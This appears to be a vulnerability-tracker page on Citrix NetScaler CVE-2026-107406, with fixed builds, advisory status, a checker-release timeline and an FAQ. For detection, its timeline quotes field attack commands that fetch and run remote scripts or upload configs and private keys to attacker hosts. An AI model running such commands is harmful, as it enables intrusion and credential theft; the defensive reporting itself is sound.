- Type
- Memory overflow vulnerability leading to Remote Code Execution or Denial of Service (CWE-119). [4]
- Exposure (IdP)
- On the builds already fixed for CTX697096 and CVE-2026-88779 - 14.1-73.37 to 73.41 inclusive, 14.1-FIPS 73.37 FIPS to 73.41 FIPS, 13.1-64.23 to 64.28 and 13.1-FIPS/NDcPP 37.279 to 37.282 - the appliance is affected only when configured as a SAML identity provider (IdP). [4]
- Exposure (SP or IdP)
- On older builds - before 14.1-73.37, before 14.1-73.37 FIPS, before 13.1-64.23 and before 13.1-37.279 - the appliance is affected when configured as a SAML service provider (SP) or SAML IdP. [4]
- Config check
- Same applicability check as CVE-2026-88779: the configuration contains add authentication samlAction (SP) or add authentication samlIdPProfile (IdP). [4][2]
- Fix
- 14.1-73.46 and later; 13.1-64.29 and later; 14.1-FIPS 14.1-73.46 FIPS and later; 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later. These builds also contain the CTX697096 and CVE-2026-88779 fixes, so one upgrade covers all three bulletins. Builds the bulletin does not list (14.1-73.42 to 73.45) with SAML configured: verify with Citrix, per the Poppelgaard checker. [4][49]
- Workaround
- The bulletin lists no workaround. [4][49]
- Also affected
- Secure Private Access Hybrid deployments using NetScaler instances must upgrade these instances to the recommended versions. Citrix-managed cloud services and Citrix-managed Adaptive Authentication are upgraded by Cloud Software Group itself. [4]
- Status
- Bulletin published 8 Oct 2026. NVD received the record at 22:17 UTC the same day (status Received; the CNA CVSS v4.0 9.5 Critical is carried as Secondary). Not in the CISA KEV catalog as of catalog 2026.10.08. Per Citrix customer guidance as quoted by secondary coverage, Citrix is not aware of any unmitigated exploits of this vulnerability; no exploitation is independently confirmed. [6][24][96]
- Acknowledgement
- Michael Tucker, Chew Keong Tan and Alex Bernier of the JPMorgan Chase XOR Team, and Maxim Suhanov - the same researchers credited in CTX697096. [4]
CVE-2026-107406: Citrix NetScaler SAML memory overflow leading to RCE or DoS
CVE-2026-107406 is a Citrix NetScaler ADC and Gateway vulnerability: SAML memory overflow leading to RCE or DoS, rated CVSS 4.0 9.5 Critical. Citrix disclosed it on 8 October 2026 in bulletin CTX697191: a SAML memory overflow leading to remote code execution or denial of service. On the builds fixed for the earlier bulletins (14.1-73.37 to 73.41, 13.1-64.23 to 64.28) only a SAML IdP is affected; on older builds a SAML SP or IdP. The bulletin lists no workaround, and Citrix says - per secondary coverage of its customer guidance - that it is not aware of any unmitigated exploits. [4][96]
- CVE
- CVE-2026-107406
- Product
- Citrix NetScaler ADC and NetScaler Gateway
- Bulletin
- CTX697191 [4]
- Severity
- CVSS 4.0: 9.5 Critical
- Exploitation
- No exploitation reported
- CISA KEV
- No
- Disclosed
- Fixed builds
- 14.1-73.46, 13.1-64.29 and FIPS/NDcPP builds
CVE-2026-107406 vulnerability records
Official records for CVE-2026-107406, checked on 9 October 2026. The CVE record was published by the CNA (NetScaler) at 2026-10-08 22:17 UTCNVD received the record on 8 October 2026 at 2026-10-08 22:17 UTC with the CNA description and CVSS v4.0 9.5 Critical carried as Secondary; NVD analysis has not started, and the CVE is not in the CISA KEV catalog..
| CVSS 4.0 vector | CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:L |
|---|---|
| Weakness (NVD) | CWE-119 |
| NVD status | Received (published 8 Oct 22:17 UTC; CNA CVSS v4.0 9.5 Critical carried as Secondary; analysis not started) |
CVE-2026-107406 timeline
- Research
Poppelgaard checker v1.9 adds public indicators
Release 1.9 of the free, read-only CTX697096 checker script adds, among others, Arctic Wolf's nsmon.pl implant, the Unit 42 .deb webshell and more attacker IPs, and tags each attack line as before or after the fix. Its author says a clean result is not proof of a clean appliance.
Sources: [49]
- Official advisory
Citrix releases a new responder policy via Support (3 October); not yet in Citrix's public post
Citrix has released a new responder policy as a mitigation for the SAML issue, distributed through Citrix Support on 3 October. The Poppelgaard checker README describes it and recognises it by behaviour on the appliance: any responder policy whose rule mentions samlauth or doAuthentication, bound to a Gateway/AAA vserver or globally, alongside Citrix's earlier RSP_POL_DROP and community Gotham policies. Citrix's public SAML post does not mention the policy yet and its text has not been published; distribution is through Support (under NDA), which matches Beaumont's reports of a responder policy shared through Support ("the policy citrix gave out doesn't work for me" on Oct 2, "the Citrix support mitigations don't appear to work" on Oct 3). The checker reminds admins to ask Citrix Support for the new policy and verifies whether it is bound - and flags a [CHECK] state where a policy is bound but the Responder feature is disabled, which silently ignores it.
- Research
Checker v1.13 + Gotham 5 Oct update: 88779 attacker IP, Huntback.io decoys, pre-disclosure /saml/login sources, SAML probe hunting, "did it run?" shell-log check
Poppelgaard's checker reaches v1.13 (105 attacker IPs, 15 domains, 34 hashes) in two steps, with third-party indicators carried from their public sources. Gotham Technology Group's 5 October update (shared with permission) adds 138.199.60.5 as an attacker IP - it sent CVE-2026-88779 crash payloads to /saml/login and /cgi/samlauth on 5 October - plus a yellow hunting lead for the 138.199.60.0/24 hosting/VPN range used throughout the SAML attack, and four sources that sent GET /saml/login before disclosure (38.60.206.53, 38.60.212.144, 149.102.254.17, 130.94.19.84). Checker v1.13 (b159493, later refined in 81c7834) adds five Huntback.io decoy IPs that sent the CVE-2026-88771 nx_verify.html injection check (138.199.60.22, 138.199.60.36, 146.70.199.170, 146.70.211.157, 23.162.8.173), randomly named *.receiver webshells in the web folders as a compromise signal (Huntback.io), a Lupovis hunting lead - User-Agent probe/1 with a ~2.8 KB SAMLRequest inflating to 62 KiB, seen on 17 September, before CVE-2026-88779 was public - and Sliver implant file checks: citrix3.bad is reported as compromise, an executable /var/tmp/.host as compromise, any other /var/tmp/.host only as a [CHECK] so a harmless file never turns red on its own. New "did it run?" check (idea from Patrick Wagner's gerGEIGER log analysis in Manuel Winkel's (Deyda) triage script; own implementation): for each login-injection attempt it shows the download hosts named in the payloads (defanged, for firewall/DNS/proxy-log searches), the likely source IP (a Client_ip field in the line, or logon requests in the HTTP access logs within 5 seconds of the attempt, with ns.log timezone differences detected automatically), and whether the payload shows up in a shell command in sh.log, bash.log or CLI shell_command lines - reported as compromise; an admin's grep or cat does not count, and the checker says when the shell logs do not reach back to the first attempt. Fewer false alarms: configuration commands such as add ns acl and bind policy patset lines after applying a mitigation batch are no longer attack lines (failed NITRO/API logins still count, because the injection can sit in the user name), and links alone in a custom theme's resources/*.xml and plugins.xml are no longer red because both hold links by design - script tags, eval and fetch are still reported. A webshell hit now also says that upgrading does not remove a webshell dropped before the upgrade. All new indicators are on this page's IoC list with per-indicator caveats.
Sources: [49]
- Research
Checker v1.14: config/SSL-key theft payload - ns.conf + all private keys dumped to a random .css, exfil to 81.94.239.8:8877; verdict line for compromised boxes
Poppelgaard's checker reaches v1.14 (106 attacker IPs, 15 domains, 34 hashes) with a config-and-key-theft payload seen in the field: it writes ns.conf and every /nsconfig/ssl/*.key into a random 6-character .css file in /var/netscaler/logon/LogonPoint (example 74tns8.css), sends that file with curl --data-binary to 81.94.239.8:8877, and the attacker then downloads the .css from the Gateway - if it worked, the attacker has the configuration and every private key. New checks: any file under the web folders (any extension) holding ===CONF: / ===KEY: markers, a private key or ns.conf lines is reported as compromise with advice to rotate all keys, certificates and passwords; GET requests for a random 6-character .css directly in LogonPoint are listed with source IP, where HTTP 404 means the dump never landed and HTTP 200 means the file existed and was downloaded (compromise); curl --data-binary @<file> and :8877/ are new exploit strings; 81.94.239.8 added as an attacker IP (single third-party field report, unverified - DEAC Hosting, Latvia; VirusTotal 1 of 92). A new final verdict line reports "VERDICT: COMPROMISED - follow CTX694799" (fixed build) or "COMPROMISED and VULNERABLE - follow CTX694799 first" with exit code 2, replacing the old "follow-up items"/"upgrade now" wording that risked wiping evidence. Community pull requests #4/#5 (feiglein74) add: any .php/.phtml under /var/netscaler/logon and /var/vpn, one-line webshells calling a request parameter as a function, PHP files the Apache error log shows running or that still exist (with first and last dates), setuid/setgid programs under /var, /tmp, /nsconfig, /flash, /home and /root, files dropped in the web folders that were downloaded with HTTP 200, and two field finds from Citrix's own IoC scan - a 2023 CVE-2023-3519-wave webshell at LogonPoint/uiareas/linux/gnuplot.php and a setuid backdoor at /var/rgroupadd (possibly 2023 leftovers; check file dates). A payload writing to a file every appliance has (e.g. /etc/httpd.conf) no longer counts as "the command ran". The release repeats the standing advice: block outbound NetScaler (NSIP/SNIP) traffic to the internet except what it needs - this payload, like the f.pylrk.cc downloads, only works if the appliance can reach the attacker's server.
Sources: [49]
- Research
Rapid7 MDR: earliest exploitation 20 Sep by 149.104.78.208 - config/keys archived to the web-served /vpn/c; two organisations compromised
Rapid7's ETR blog (updated 6 Oct) details what its MDR observed: the earliest CVE-2026-88771 exploitation attempt in its telemetry was 20 September 2026 14:28:43 UTC from 149.104.78.208 - only two attempts that day, not yet widespread. The injected username (a fake pitboss "missed too many heartbeats" line) ran tar czf /var/netscaler/gui/vpn/c -C /flash nsconfig, which archives /flash/nsconfig into the publicly served /var/netscaler/gui/vpn/ folder: ns.conf (encrypted nsroot and admin passwords, LDAP/RADIUS/TACACS bind passwords), the ssl/ directory (certificates and private keys), SSH host keys and license files. Once the command runs, any unauthenticated GET https://<gateway>/vpn/c returns the archive with no login. Rapid7 identifies two organisations compromised through CVE-2026-88771: this command injection, and a .ctxs.receiver webshell at /var/netscaler/logon/LogonPoint/custom/.ctxs.receiver (SHA-256 ed082f74..., observed 24 September - the same sample IFIN relayed from Reddit, now vendor-confirmed). The checker v1.11 carried 149.104.78.208 with a Rapid7 attribution and the /vpn/c tar detail; the tar archive /vpn/c is already a compromise check in the checker (HTTP 200 on /vpn/c = the config archive was likely downloaded). Also in this update: the 6-crash-then-reboot behaviour of CVE-2026-88779 and the October content-release checks. All indicators are on this page's IoC list.
- Official advisory
NVD publishes CVE-2026-107406 (status Received); not in CISA KEV
NVD received the CVE-2026-107406 record at 22:17 UTC with the CNA (NetScaler) description and the CVSS v4.0 9.5 Critical score carried as Secondary; NVD analysis has not started. The CISA KEV catalog (version 2026.10.08, released 20:09 UTC the same day) does not contain CVE-2026-107406, and no exploitation has been publicly confirmed. Per secondary coverage of Citrix's customer guidance, Citrix says it is not aware of any unmitigated exploits of this vulnerability.
- Research
Poppelgaard checker v1.15 and v1.16: WHIPSHOT/SLAPSHOT scan detection, log-reflection technique, SOCRadar "NetScaler C2" agent, CVE-2026-107406 IdP/SP check
v1.15 (8 Oct): Lupovis shows scanning for the WHIPSHOT/SLAPSHOT webshells started before Mandiant published them, with a 10-step scan since 4 Oct; the checker adds receiver.deb / random 12-character .deb theme-folder probes, the g-suffix .css cache-bypass requests, and detects the log-reflection technique - an actor parks a whole shell script in a tagged User-Agent so it lands in the HTTP access log, then the CVE-2026-88771 injection carries only grep <tag>: /var/log/htt* | sed ... | sh, so filters watching the login field never see the payload. SOCRadar's automated "NetScaler C2" framework injects curl${IFS}-sk${IFS}45.143.130.195:8899/s/<id>|sh and installs a polling agent at /tmp/.nsagent, reported by the checker as compromise. v1.16 (8 Oct): adds the CVE-2026-107406 build and SAML IdP/SP check (verdict VULNERABLE_CVE-2026-107406, exit code 2, also on builds already fixed for CTX697096 and CVE-2026-88779), and - from a community report the same day - an overnight wave of the same login injection fetching https://v5v.in/r.sh?k=<key>|sh; payload host v5v.in and IP 72.5.65.111 added (totals 132 attacker IPs, 18 domains, 38 hashes). Since v1.15 the compromise sweep runs by default on the appliance.
Sources: [49]
- Official advisory
Citrix publishes CTX697191: CVE-2026-107406, SAML memory overflow leading to RCE or DoS, CVSS 9.5 - SAML deployments must upgrade again
Third NetScaler bulletin of the campaign, separate from CTX697096 and CTX697174. Preconditions are SAML SP or IdP with version-dependent scope: on the builds already fixed for the earlier bulletins (14.1-73.37 to 73.41 inclusive, 14.1-FIPS 73.37 to 73.41 FIPS, 13.1-64.23 to 64.28, 13.1-FIPS/NDcPP 37.279 to 37.282) only a SAML IdP (add authentication samlIdPProfile) is affected; on older builds both SP (samlAction) and IdP. Fixed in 14.1-73.46, 13.1-64.29, 14.1-73.46 FIPS and 13.1-37.283 FIPS/NDcPP - builds that also carry the CTX697096 and CVE-2026-88779 fixes, so one upgrade covers everything. The bulletin lists no workaround and adds that Secure Private Access Hybrid deployments using NetScaler instances are also affected. This is the third required upgrade in under two weeks for SAML appliances that kept up with the previous bulletins.
Sources: [4]
Questions about CVE-2026-107406
Is there a new NetScaler issue involving SAML?
Yes - two, both needing SAML SP or IdP configuration. CVE-2026-88779 (bulletin CTX697174, 3 Oct): memory overflow leading to denial of service, CVSS 4.0 8.7, exploited in targeted attacks, in CISA KEV since 4 Oct; fixed in 14.1-73.41, 13.1-64.28 and the matching FIPS/NDcPP builds. CVE-2026-107406 (bulletin CTX697191, 8 Oct): memory overflow leading to remote code execution or denial of service, CVSS 4.0 9.5; on the builds fixed for the earlier bulletins (14.1-73.37 to 73.41, 13.1-64.23 to 64.28) it affects only appliances configured as a SAML IdP, and on older builds also SAML SPs; fixed in 14.1-73.46, 13.1-64.29 and the matching FIPS/NDcPP builds, which cover all three bulletins in one upgrade. Citrix lists no workaround for either. Per secondary coverage of its customer guidance Citrix is not aware of any unmitigated exploits of CVE-2026-107406, and no exploitation is independently confirmed. Beaumont reports his patched honeypots crashing, which is one researcher's observation. [2][3][4][31][90][91]
Which NetScaler vulnerabilities are exploited?
CVE-2026-88771 (unauthenticated remote command execution in the default configuration, CVSS 4.0 9.5), CVE-2026-88772 (DTLS memory overflow leading to RCE or DoS, CVSS 4.0 9.5) and, since 4 Oct 2026, CVE-2026-88779 (SAML memory overflow leading to DoS, CVSS 4.0 8.7). All three are in CISA's KEV catalog. CVE-2026-107406 (SAML, CVSS 4.0 9.5, 8 Oct) is not in KEV and Citrix says it is not aware of any unmitigated exploits of it. Kevin Beaumont reports CVE-2026-88773 was chained with the two, but no other source has independently confirmed that. No exploitation is reported for CVE-2026-88774 to CVE-2026-88778. [1][24][3][4][79]
Which NetScaler versions fix CVE-2026-88771 and CVE-2026-88772?
Per CTX697096: NetScaler ADC/Gateway 14.1-73.37 and later; 13.1-64.23 and later; ADC 14.1-FIPS 14.1-73.37 FIPS and later; ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.279 and later (the bulletin also writes this build as 13.1-37.279). A SAML appliance should not stop there: 14.1-73.46, 13.1-64.29 and the matching FIPS/NDcPP builds fix CVE-2026-88779 and CVE-2026-107406 as well. [1]
What fixes CVE-2026-107406, and why upgrade again if I already patched?
CVE-2026-107406 is fixed in 14.1-73.46, 13.1-64.29, 14.1-73.46 FIPS and 13.1-37.283 FIPS/NDcPP (bulletin CTX697191, 8 Oct 2026). The builds from 27 Sep and 3 Oct (14.1-73.37/73.41, 13.1-64.23/64.28 and the FIPS/NDcPP equivalents) do not fix it: on those, an appliance configured as a SAML IdP is affected, and on older builds a SAML SP or IdP. Those builds are also where CVE-2026-88779 stops, so the 73.46/64.29/37.283 generation is the first that covers all three bulletins - the third required upgrade in under two weeks for SAML deployments that kept up. Check the configuration for add authentication samlIdPProfile (IdP) or add authentication samlAction (SP); the bulletin lists no workaround. [4][3]
Which NetScaler versions fix CVE-2026-88779, and why does stat denylist global AAA_REQUEST fail?
CVE-2026-88779 needs newer builds than the September fixes: 14.1-73.41, 13.1-64.28, 14.1-73.41 FIPS or 13.1-37.282 FIPS/NDcPP (per bulletin CTX697174). CVE-2026-107406 then needs 14.1-73.46, 13.1-64.29, 14.1-73.46 FIPS or 13.1-37.283 FIPS/NDcPP (CTX697191) - install that generation and both SAML issues are covered. As an interim measure, Citrix has released Global Deny List signatures for standard (non-FIPS) 14.1 and 13.1 appliances on the September builds, managed through NetScaler Console. Beazley's IR (4 Oct) describes the mechanism: the crash hits nsaaad while processing signature canonicalization with an oversized InclusiveNamespaces PrefixList; attackers use the resulting reboots to re-trigger the CVE-2026-88771 log injection on already-infected appliances, but appliances patched on 27 Sep no longer execute the injected commands. A customer report in Citrix's forum (unconfirmed, no Citrix reply) says that after patching to 13.1-64.28, stat denylist global AAA_REQUEST returns "no such resource" or an empty result where it previously showed hits - the customer's own interpretation is that the Deny List signatures apply per firmware to the CVEs known for that build. Verify mitigation state through NetScaler Console rather than relying on that one command. [3][31][50]